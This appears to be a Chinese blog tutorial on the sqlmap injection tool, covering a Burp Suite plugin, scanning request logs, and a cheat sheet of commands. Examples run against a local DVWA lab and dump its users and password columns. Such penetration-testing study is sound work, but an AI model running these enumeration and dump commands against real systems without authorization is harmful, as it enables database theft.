05 SQLmap

作者: 测试有话说 | 来源:发表于2021-06-08 10:45 被阅读0次

    插件方式

    设置只要在:extender-->extentions-->add 添加jar就OK了!

    不过需要BurpSuite需要放到sqlmap根目录下!

    本插件实现原理:

    将目标请求的数据存放到临时文件中,然后调用

    "sqlmap.py -r $file"来启动对请求的sql注入检测 在Sqlmap tab中,你可以配置sqlmap除 -r外的其他参数,比如:
    加入配置中写:"--level 3",真实执行时是:sqlmap.py -r $file --level 3
    
    sqlmap结合burpsuite注入
    抓包
    sqlmap检测:sqlmap.py -r burpsuite抓包.txt
    
    

    回到burpsuite主页面,在任何请求连接上右键,会看到新增"send to Sqlmap",点击后会开启cmd窗口,针对此请求进行sql注入检测
    设置sqlmap参数:

    image.png

    另一种方式

    image.png

    使用sqlmap对log进行测试

    python sqlmap.py -l D:\log\log1.txt --batch

    _____PS:加batch是为能自动选择Yes


    image.png

    401 (Unauthorized) - 1 times
    [18:08:41] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\Administrator\AppData\Local\sqlmap\output\results-06042021_0607pm.csv'
    生成文件

    执行

    image.png

    常见命令

    sqlmap -hh
    
    sqlmap.py -u "[URL]"   或  sqlmap.py -r "[数据包_path]"
    
    sqlmap.py -u "[URL]" –dbs    //获取数据库
    
    sqlmap.py -u "[URL]" --current-db    //获取当前数据库名
    
    sqlmap.py -u "[URL]" --current-user    //获取当前数据库的用户名
    
    sqlmap.py -u "[URL]" --tables    //获取数据的所有表名
    
    sqlmap.py -u "[URL]" --tables -D [数据库名]    //获取指定数据库中的所有表名
    
    sqlmap.py -u "[URL]" --column -T [表名] -D [数据库名]    //获取指定表中的列字段
    
    sqlmap.py -u "[URL]" --dump -C [列名] -T [表名] -D [数据库名]  //爆指定列中的字段
    
    sqlmap.py -u "[URL]" --privileges     //查看当前数据库的用户权限
    
    sqlmap.py -u "[URL]" --password    //爆数据库的密码
    
    sqlmap.py -u "[URL]" --is-dba -v 1    //看有没有数据库管理员权限
    
    

    示例

    #查看所有的数据库
    python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4iij3d2sluivmqejvpvi88tpd7" --dbs
    #查看当前的数据库名称
    python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4iij3d2sluivmqejvpvi88tpd7" --current-db
    #查看当前库所有表格
    python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4iij3d2sluivmqejvpvi88tpd7" --batch -D dvwa --tables
    #查看表数据格式
    python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4iij3d2sluivmqejvpvi88tpd7" --batch -D dvwa -T users --columns
    #查看数据库中的指定表格数据
    python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4iij3d2sluivmqejvpvi88tpd7" --batch -D dvwa -T users  -C "user,password" --dump
    

    增值学习资料

    sqlmap 内核分析  原理分析
    网址:
    anquanke.com/subject/id/160641
    sqlmap 的一些字典
    E:\ProgramData\Anaconda3\Lib\site-packages\sqlmap\data\txt
    
     'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME'
     sqlmap  -d "mysql://用户名:密码@localhost:端口号/user" -f --banner --dbs --users
    
    扩展版本
    github.com/s0md3v/sqlmate
    码云地址;gitee.com/dasssa/sqlmate
    

    相关文章

      网友评论

          本文标题:05 SQLmap

          本文链接:https://www.haomeiwen.com/subject/zxezsltx.html